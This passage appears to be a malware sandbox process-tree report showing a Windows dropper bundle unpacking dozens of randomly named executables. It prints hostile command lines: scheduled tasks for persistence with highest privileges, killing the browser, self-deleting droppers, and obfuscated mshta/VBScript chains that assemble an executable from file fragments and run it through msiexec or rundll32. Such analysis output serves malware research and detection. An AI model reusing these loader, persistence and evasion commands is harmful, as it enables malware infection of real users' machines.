C:\Users\Admin\Pictures\Adobe Films\Ued8wJc8PvO47vR8LkjC9lUx.exe"C:\Users\Admin\Pictures\Adobe Films\Ued8wJc8PvO47vR8LkjC9lUx.exe"5⤵PID:5816
-
-
C:\Users\Admin\Pictures\Adobe Films\edyeHtAznhm0W45yCazn5hJO.exe"C:\Users\Admin\Pictures\Adobe Films\edyeHtAznhm0W45yCazn5hJO.exe"5⤵PID:5808
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\edyeHtAznhm0W45yCazn5hJO.exe" & exit6⤵PID:3468
-
C:\Windows\SysWOW64\timeout.exetimeout /t 57⤵
- Delays execution with timeout.exe
PID:4744
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\kAEgEQo7M11yzMGM3ONvU1h_.exe"C:\Users\Admin\Pictures\Adobe Films\kAEgEQo7M11yzMGM3ONvU1h_.exe"5⤵PID:5800
-
-
C:\Users\Admin\Pictures\Adobe Films\mBLUSuUjKbeAELDqYr0XG5pu.exe"C:\Users\Admin\Pictures\Adobe Films\mBLUSuUjKbeAELDqYr0XG5pu.exe"5⤵PID:5792
-
C:\Users\Admin\Pictures\Adobe Films\mBLUSuUjKbeAELDqYr0XG5pu.exe"C:\Users\Admin\Pictures\Adobe Films\mBLUSuUjKbeAELDqYr0XG5pu.exe"6⤵PID:4608
-
-
-
C:\Users\Admin\Pictures\Adobe Films\HByVuFsoVTnUpg1o9KF9hGGW.exe"C:\Users\Admin\Pictures\Adobe Films\HByVuFsoVTnUpg1o9KF9hGGW.exe"5⤵PID:5784
-
-
C:\Users\Admin\Pictures\Adobe Films\iDoxzDw1c72todCgBHsj7Xm5.exe"C:\Users\Admin\Pictures\Adobe Films\iDoxzDw1c72todCgBHsj7Xm5.exe"5⤵PID:5776
-
C:\Program Files (x86)\Company\NewProduct\cutm3.exe"C:\Program Files (x86)\Company\NewProduct\cutm3.exe"6⤵PID:5492
-
-
-
C:\Users\Admin\Pictures\Adobe Films\Z50JsvCPVc8vsMmTgUCPg4uH.exe"C:\Users\Admin\Pictures\Adobe Films\Z50JsvCPVc8vsMmTgUCPg4uH.exe"5⤵PID:5768
-
-
C:\Users\Admin\Pictures\Adobe Films\1tem0DbuqfdCay6ND5uowKVF.exe"C:\Users\Admin\Pictures\Adobe Films\1tem0DbuqfdCay6ND5uowKVF.exe"5⤵PID:5760
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST6⤵
- Creates scheduled task(s)
PID:5336
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST6⤵
- Creates scheduled task(s)
PID:4060
-
-
C:\Users\Admin\Documents\SeEizeknh5jsESGKAraqErA4.exe"C:\Users\Admin\Documents\SeEizeknh5jsESGKAraqErA4.exe"6⤵PID:4444
-
C:\Users\Admin\Pictures\Adobe Films\GDvrzuuGR5zcgdBDiMTEoSZN.exe"C:\Users\Admin\Pictures\Adobe Films\GDvrzuuGR5zcgdBDiMTEoSZN.exe"7⤵PID:5156
-
-
C:\Users\Admin\Pictures\Adobe Films\Mo6oQQba2ks31gXhNTwy55rF.exe"C:\Users\Admin\Pictures\Adobe Films\Mo6oQQba2ks31gXhNTwy55rF.exe"7⤵PID:4948
-
-
C:\Users\Admin\Pictures\Adobe Films\8jD95dhzTomuBg_VEeJiGnpa.exe"C:\Users\Admin\Pictures\Adobe Films\8jD95dhzTomuBg_VEeJiGnpa.exe"7⤵PID:3156
-
-
C:\Users\Admin\Pictures\Adobe Films\0ozAyp9E5anuId7uIh5cDvlH.exe"C:\Users\Admin\Pictures\Adobe Films\0ozAyp9E5anuId7uIh5cDvlH.exe"7⤵PID:4264
-
-
C:\Users\Admin\Pictures\Adobe Films\yGCXij5lnmj9_Q3IXwONZH_b.exe"C:\Users\Admin\Pictures\Adobe Films\yGCXij5lnmj9_Q3IXwONZH_b.exe"7⤵PID:5820
-
-
C:\Users\Admin\Pictures\Adobe Films\IrZPx0OXbYWEDTQ2HzrbFqXL.exe"C:\Users\Admin\Pictures\Adobe Films\IrZPx0OXbYWEDTQ2HzrbFqXL.exe"7⤵PID:5316
-
-
C:\Users\Admin\Pictures\Adobe Films\iu3IZ2tWnp4YqbKkE5BIm6Ab.exe"C:\Users\Admin\Pictures\Adobe Films\iu3IZ2tWnp4YqbKkE5BIm6Ab.exe"7⤵PID:4812
-
-
C:\Users\Admin\Pictures\Adobe Films\aiygtnyvCKdlNCtlq71LSidw.exe"C:\Users\Admin\Pictures\Adobe Films\aiygtnyvCKdlNCtlq71LSidw.exe"7⤵PID:5924
-
-
C:\Users\Admin\Pictures\Adobe Films\09M3MWYgdXpSZYZ2D9B7iXRO.exe"C:\Users\Admin\Pictures\Adobe Films\09M3MWYgdXpSZYZ2D9B7iXRO.exe"7⤵PID:6004
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat07e9c37490fe.exe3⤵
- Suspicious use of WriteProcessMemory
PID:3296 -
C:\Users\Admin\AppData\Local\Temp\7zS86117CE6\Sat07e9c37490fe.exeSat07e9c37490fe.exe4⤵
- Executes dropped EXE
PID:1188 -
C:\Users\Admin\AppData\Local\Temp\is-P259V.tmp\Sat07e9c37490fe.tmp"C:\Users\Admin\AppData\Local\Temp\is-P259V.tmp\Sat07e9c37490fe.tmp" /SL5="$701DC,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS86117CE6\Sat07e9c37490fe.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1436
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat07614156b9.exe3⤵
- Suspicious use of WriteProcessMemory
PID:3184 -
C:\Users\Admin\AppData\Local\Temp\7zS86117CE6\Sat07614156b9.exeSat07614156b9.exe4⤵
- Executes dropped EXE
PID:2980
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat07d02d52f12b90a09.exe3⤵
- Suspicious use of WriteProcessMemory
PID:3784 -
C:\Users\Admin\AppData\Local\Temp\7zS86117CE6\Sat07d02d52f12b90a09.exeSat07d02d52f12b90a09.exe4⤵PID:1276
-
C:\Users\Admin\AppData\Local\Temp\7zS86117CE6\Sat07d02d52f12b90a09.exeC:\Users\Admin\AppData\Local\Temp\7zS86117CE6\Sat07d02d52f12b90a09.exe5⤵PID:2020
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat078d56c22d5608.exe3⤵PID:1044
-
C:\Users\Admin\AppData\Local\Temp\7zS86117CE6\Sat078d56c22d5608.exeSat078d56c22d5608.exe4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3168
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat072bcdd89ba501.exe3⤵PID:2032
-
C:\Users\Admin\AppData\Local\Temp\7zS86117CE6\Sat072bcdd89ba501.exeSat072bcdd89ba501.exe4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:868 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe5⤵PID:5636
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe6⤵
- Kills process with taskkill
PID:4784
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat074e845efaeece03a.exe /mixone3⤵PID:2328
-
C:\Users\Admin\AppData\Local\Temp\7zS86117CE6\Sat074e845efaeece03a.exeSat074e845efaeece03a.exe /mixone4⤵
- Executes dropped EXE
PID:2304 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2304 -s 6605⤵
- Program crash
PID:4604
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2304 -s 6965⤵
- Program crash
PID:4852
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2304 -s 7845⤵
- Program crash
PID:4292
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2304 -s 8205⤵
- Program crash
PID:4588
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2304 -s 7925⤵
- Program crash
PID:5020
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat07bef3fafabad89d.exe3⤵PID:3440
-
C:\Users\Admin\AppData\Local\Temp\7zS86117CE6\Sat07bef3fafabad89d.exeSat07bef3fafabad89d.exe4⤵
- Executes dropped EXE
PID:624
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3600 -s 6003⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:3820
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat078275687fbd9.exe3⤵PID:1284
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat07d125711b.exe3⤵PID:992
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat074f80a721d3d68.exe3⤵PID:1096
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat07ef90595a09690a.exe3⤵PID:1020
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat070ac8db855946e70.exe3⤵PID:3796
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat0766fe31a9db7.exe3⤵
- Suspicious use of WriteProcessMemory
PID:608
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zS86117CE6\Sat074f80a721d3d68.exeSat074f80a721d3d68.exe1⤵
- Executes dropped EXE
PID:3104
-
C:\Users\Admin\AppData\Local\Temp\7zS86117CE6\Sat07d125711b.exeSat07d125711b.exe1⤵
- Executes dropped EXE
PID:2172 -
C:\Users\Admin\Pictures\Adobe Films\BX4A1BSf6Kw7x8YS01SJfqtR.exe"C:\Users\Admin\Pictures\Adobe Films\BX4A1BSf6Kw7x8YS01SJfqtR.exe"2⤵PID:4928
-
-
C:\Users\Admin\Pictures\Adobe Films\QRwKxYQmggz8w3jIvaRnUQOr.exe"C:\Users\Admin\Pictures\Adobe Films\QRwKxYQmggz8w3jIvaRnUQOr.exe"2⤵PID:4896
-
-
C:\Users\Admin\Pictures\Adobe Films\XQlRidXs8zm4FKnAKyMgbKWR.exe"C:\Users\Admin\Pictures\Adobe Films\XQlRidXs8zm4FKnAKyMgbKWR.exe"2⤵PID:4904
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "XQlRidXs8zm4FKnAKyMgbKWR.exe" /f & erase "C:\Users\Admin\Pictures\Adobe Films\XQlRidXs8zm4FKnAKyMgbKWR.exe" & exit3⤵PID:1996
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "XQlRidXs8zm4FKnAKyMgbKWR.exe" /f4⤵
- Kills process with taskkill
PID:3924
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\kkNSqNhebuqdfc5dGGs1K4Oz.exe"C:\Users\Admin\Pictures\Adobe Films\kkNSqNhebuqdfc5dGGs1K4Oz.exe"2⤵PID:4384
-
-
C:\Users\Admin\Pictures\Adobe Films\37aEPqxQZxc4JHAYKYQEdM6c.exe"C:\Users\Admin\Pictures\Adobe Films\37aEPqxQZxc4JHAYKYQEdM6c.exe"2⤵PID:4924
-
C:\Users\Admin\Pictures\Adobe Films\37aEPqxQZxc4JHAYKYQEdM6c.exe"C:\Users\Admin\Pictures\Adobe Films\37aEPqxQZxc4JHAYKYQEdM6c.exe"3⤵PID:5188
-
-
-
C:\Users\Admin\Pictures\Adobe Films\rnsQZ_YILpR_VtQPulXzM7OZ.exe"C:\Users\Admin\Pictures\Adobe Films\rnsQZ_YILpR_VtQPulXzM7OZ.exe"2⤵PID:4172
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST3⤵
- Creates scheduled task(s)
PID:4688
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST3⤵
- Creates scheduled task(s)
PID:4128
-
-
C:\Users\Admin\Documents\R62HAyXxwedcKgxTL2ZkYOOo.exe"C:\Users\Admin\Documents\R62HAyXxwedcKgxTL2ZkYOOo.exe"3⤵PID:2296
-
C:\Users\Admin\Pictures\Adobe Films\4u4PCiH8LINpQKXeMtMz9nU9.exe"C:\Users\Admin\Pictures\Adobe Films\4u4PCiH8LINpQKXeMtMz9nU9.exe"4⤵PID:372
-
-
C:\Users\Admin\Pictures\Adobe Films\CInU_S6jLJMylp1aT3A6RAgp.exe"C:\Users\Admin\Pictures\Adobe Films\CInU_S6jLJMylp1aT3A6RAgp.exe"4⤵PID:5392
-
-
C:\Users\Admin\Pictures\Adobe Films\b0posbz8d_9fg1IeicMprb0L.exe"C:\Users\Admin\Pictures\Adobe Films\b0posbz8d_9fg1IeicMprb0L.exe"4⤵PID:6024
-
-
C:\Users\Admin\Pictures\Adobe Films\SdhvuJEN6Vemq6hLoLzKQCUH.exe"C:\Users\Admin\Pictures\Adobe Films\SdhvuJEN6Vemq6hLoLzKQCUH.exe"4⤵PID:4128
-
-
C:\Users\Admin\Pictures\Adobe Films\J8c2my9havZ3sB2nIXHwCxkF.exe"C:\Users\Admin\Pictures\Adobe Films\J8c2my9havZ3sB2nIXHwCxkF.exe"4⤵PID:5948
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\Pictures\Adobe Films\J8c2my9havZ3sB2nIXHwCxkF.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If """" == """" for %M in (""C:\Users\Admin\Pictures\Adobe Films\J8c2my9havZ3sB2nIXHwCxkF.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )5⤵PID:4552
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\Pictures\Adobe Films\J8c2my9havZ3sB2nIXHwCxkF.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""=="" for %M in ("C:\Users\Admin\Pictures\Adobe Films\J8c2my9havZ3sB2nIXHwCxkF.exe" ) do taskkill -f -iM "%~NxM"6⤵PID:6948
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\9kRaju7RmDXUJpILzwrBoGmu.exe"C:\Users\Admin\Pictures\Adobe Films\9kRaju7RmDXUJpILzwrBoGmu.exe"4⤵PID:5844
-
-
C:\Users\Admin\Pictures\Adobe Films\58D2RLG5PyAKBf_GdTSuOlzx.exe"C:\Users\Admin\Pictures\Adobe Films\58D2RLG5PyAKBf_GdTSuOlzx.exe"4⤵PID:3708
-
-
C:\Users\Admin\Pictures\Adobe Films\68pD9U9vFxMQA_y1sJV5U6Qj.exe"C:\Users\Admin\Pictures\Adobe Films\68pD9U9vFxMQA_y1sJV5U6Qj.exe"4⤵PID:4844
-
C:\Users\Admin\AppData\Local\Temp\is-T4MKA.tmp\68pD9U9vFxMQA_y1sJV5U6Qj.tmp"C:\Users\Admin\AppData\Local\Temp\is-T4MKA.tmp\68pD9U9vFxMQA_y1sJV5U6Qj.tmp" /SL5="$2039C,506127,422400,C:\Users\Admin\Pictures\Adobe Films\68pD9U9vFxMQA_y1sJV5U6Qj.exe"5⤵PID:1236
-
-
-
C:\Users\Admin\Pictures\Adobe Films\SW4ph0QO8KeHQxA0mB0tGxu_.exe"C:\Users\Admin\Pictures\Adobe Films\SW4ph0QO8KeHQxA0mB0tGxu_.exe"4⤵PID:5268
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\1ePkAqiVbmadYwUxwqA7YnfG.exe"C:\Users\Admin\Pictures\Adobe Films\1ePkAqiVbmadYwUxwqA7YnfG.exe"2⤵PID:4408
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBScrIPt: Close ( cReATeoBjeCT ( "WSCripT.Shell" ). run ( "cMD /C TYPE ""C:\Users\Admin\AppData\Local\Temp\7zS86117CE6\Sat0766fe31a9db7.exe"" > ..\7XGl0.eXe && StArt ..\7XGl0.exe -PHCDN~eFx~sxtbDEuGImAaeZWJ & If """" == """" for %f iN ( ""C:\Users\Admin\AppData\Local\Temp\7zS86117CE6\Sat0766fe31a9db7.exe"" ) do taskkill -Im ""%~nXf"" -F " , 0 , TrUE) )1⤵PID:604
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C TYPE "C:\Users\Admin\AppData\Local\Temp\7zS86117CE6\Sat0766fe31a9db7.exe" > ..\7XGl0.eXe && StArt ..\7XGl0.exe -PHCDN~eFx~sxtbDEuGImAaeZWJ &If "" == "" for %f iN ( "C:\Users\Admin\AppData\Local\Temp\7zS86117CE6\Sat0766fe31a9db7.exe" ) do taskkill -Im "%~nXf" -F2⤵PID:4164
-
C:\Users\Admin\AppData\Local\Temp\7XGl0.eXe..\7XGl0.exe -PHCDN~eFx~sxtbDEuGImAaeZWJ3⤵PID:4508
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBScrIPt: Close ( cReATeoBjeCT ( "WSCripT.Shell" ). run ( "cMD /C TYPE ""C:\Users\Admin\AppData\Local\Temp\7XGl0.eXe"" > ..\7XGl0.eXe && StArt ..\7XGl0.exe -PHCDN~eFx~sxtbDEuGImAaeZWJ & If ""-PHCDN~eFx~sxtbDEuGImAaeZWJ "" == """" for %f iN ( ""C:\Users\Admin\AppData\Local\Temp\7XGl0.eXe"" ) do taskkill -Im ""%~nXf"" -F " , 0 , TrUE) )4⤵PID:4692
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C TYPE "C:\Users\Admin\AppData\Local\Temp\7XGl0.eXe" > ..\7XGl0.eXe && StArt ..\7XGl0.exe -PHCDN~eFx~sxtbDEuGImAaeZWJ &If "-PHCDN~eFx~sxtbDEuGImAaeZWJ " == "" for %f iN ( "C:\Users\Admin\AppData\Local\Temp\7XGl0.eXe" ) do taskkill -Im "%~nXf" -F5⤵PID:4864
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbScrIpT: ClOSe ( cReATeobject ("wSCRipT.shEll" ).RuN ( "CMd.eXe /c EChO | seT /p = ""MZ"" >FRI95Q.0xU & cOpY /y /b FRI95Q.0xu+ _Cr7.b13 +xECYZ.Z0e + FCKO.EQ + EE5WLneE.Q + zmMrAoI.L ..\8~zJBg7.3m &sTarT msiexec.exe /Y ..\8~ZJBg7.3m & dEl /Q * " ,0 , trUe ) )4⤵
- Executes dropped EXE
PID:1276 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c EChO | seT /p = "MZ" >FRI95Q.0xU& cOpY /y /b FRI95Q.0xu+ _Cr7.b13 +xECYZ.Z0e + FCKO.EQ + EE5WLneE.Q + zmMrAoI.L ..\8~zJBg7.3m&sTarT msiexec.exe /Y ..\8~ZJBg7.3m & dEl /Q *5⤵PID:4700
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EChO "6⤵PID:4156
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" seT /p = "MZ" 1>FRI95Q.0xU"6⤵PID:3452
-
-
C:\Windows\SysWOW64\msiexec.exemsiexec.exe /Y ..\8~ZJBg7.3m6⤵PID:4636
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -Im "Sat0766fe31a9db7.exe" -F3⤵
- Kills process with taskkill
PID:4796
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ("CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\7zS86117CE6\Sat07bef3fafabad89d.exe"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If """" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\7zS86117CE6\Sat07bef3fafabad89d.exe"") do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )1⤵PID:1900
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\7zS86117CE6\Sat07bef3fafabad89d.exe" 09xU.exE &&STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "" =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\7zS86117CE6\Sat07bef3fafabad89d.exe") do taskkill /F -Im "%~NxU"2⤵PID:4260
-
C:\Users\Admin\AppData\Local\Temp\09xU.exE09xU.EXE -pPtzyIkqLZoCarb5ew3⤵PID:4556
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ("CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If ""-pPtzyIkqLZoCarb5ew "" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"") do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )4⤵PID:4764
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\09xU.exE" 09xU.exE &&STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "-pPtzyIkqLZoCarb5ew " =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\09xU.exE") do taskkill /F -Im "%~NxU"5⤵PID:4936
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbScRipT: cloSE ( creAteobjECT ( "WscriPT.SHell" ). RuN ( "cMd.exE /Q /r eCHO | SET /P = ""MZ"" > ScMeAP.SU & CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I & StART control .\R6f7sE.I " ,0,TRuE) )4⤵PID:4436
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /r eCHO | SET /P = "MZ" > ScMeAP.SU &CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH +7TCInEJp.0 + yKIfDQA.1 r6f7sE.I& StART control .\R6f7sE.I5⤵PID:4864
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" eCHO "6⤵PID:3964
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>ScMeAP.SU"6⤵PID:4136
-
-
C:\Windows\SysWOW64\control.execontrol .\R6f7sE.I6⤵PID:4628
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\R6f7sE.I7⤵PID:4236
-
C:\Windows\system32\RunDll32.exeC:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\R6f7sE.I8⤵PID:3112
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\R6f7sE.I9⤵PID:5412
-
-
-
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F -Im "Sat07bef3fafabad89d.exe"3⤵
- Kills process with taskkill
PID:4908
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-JJRP8.tmp\Sat07e9c37490fe.tmp"C:\Users\Admin\AppData\Local\Temp\is-JJRP8.tmp\Sat07e9c37490fe.tmp" /SL5="$40150,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS86117CE6\Sat07e9c37490fe.exe" /SILENT1⤵
- Executes dropped EXE
PID:1572
-
C:\Users\Admin\AppData\Local\Temp\7zS86117CE6\Sat07e9c37490fe.exe"C:\Users\Admin\AppData\Local\Temp\7zS86117CE6\Sat07e9c37490fe.exe" /SILENT1⤵
- Executes dropped EXE
PID:1168
-
C:\Users\Admin\AppData\Local\Temp\7zS86117CE6\Sat078275687fbd9.exeSat078275687fbd9.exe1⤵
- Executes dropped EXE
PID:1768 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1768 -s 13362⤵
- Program crash
PID:3868
-
-
C:\Users\Admin\AppData\Local\Temp\7zS86117CE6\Sat070ac8db855946e70.exeSat070ac8db855946e70.exe1⤵
- Executes dropped EXE
PID:2368
-
C:\Users\Admin\AppData\Local\Temp\7zS86117CE6\Sat07ef90595a09690a.exeSat07ef90595a09690a.exe1⤵
- Executes dropped EXE
PID:3016
-
C:\Users\Admin\AppData\Local\Temp\7zS86117CE6\Sat0766fe31a9db7.exeSat0766fe31a9db7.exe1⤵
- Executes dropped EXE
PID:3180
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵PID:4440
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:1764
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService1⤵PID:4716
-
C:\Windows\SysWOW64\autochk.exe"C:\Windows\SysWOW64\autochk.exe"1⤵PID:5904
-
C:\Windows\SysWOW64\wscript.exe"C:\Windows\SysWOW64\wscript.exe"1⤵PID:6044
-
C:\Windows\SysWOW64\cmd.exe/c del "C:\Users\Admin\Pictures\Adobe Films\1ePkAqiVbmadYwUxwqA7YnfG.exe"2⤵PID:5500
-
-
C:\Users\Admin\AppData\Roaming\Underdress.exeC:\Users\Admin\AppData\Roaming\Underdress.exe1⤵PID:6092
-
C:\Users\Admin\AppData\Local\Temp\Unseduceability.exe"C:\Users\Admin\AppData\Local\Temp\Unseduceability.exe"2⤵PID:6068
-
-
C:\Users\Admin\AppData\Roaming\MegogoSell_crypted.exeC:\Users\Admin\AppData\Roaming\MegogoSell_crypted.exe1⤵PID:6084
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"2⤵PID:4176
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6084 -s 5522⤵
- Program crash
PID:5380
-
-
C:\Windows\SysWOW64\cmmon32.exe"C:\Windows\SysWOW64\cmmon32.exe"1⤵PID:5464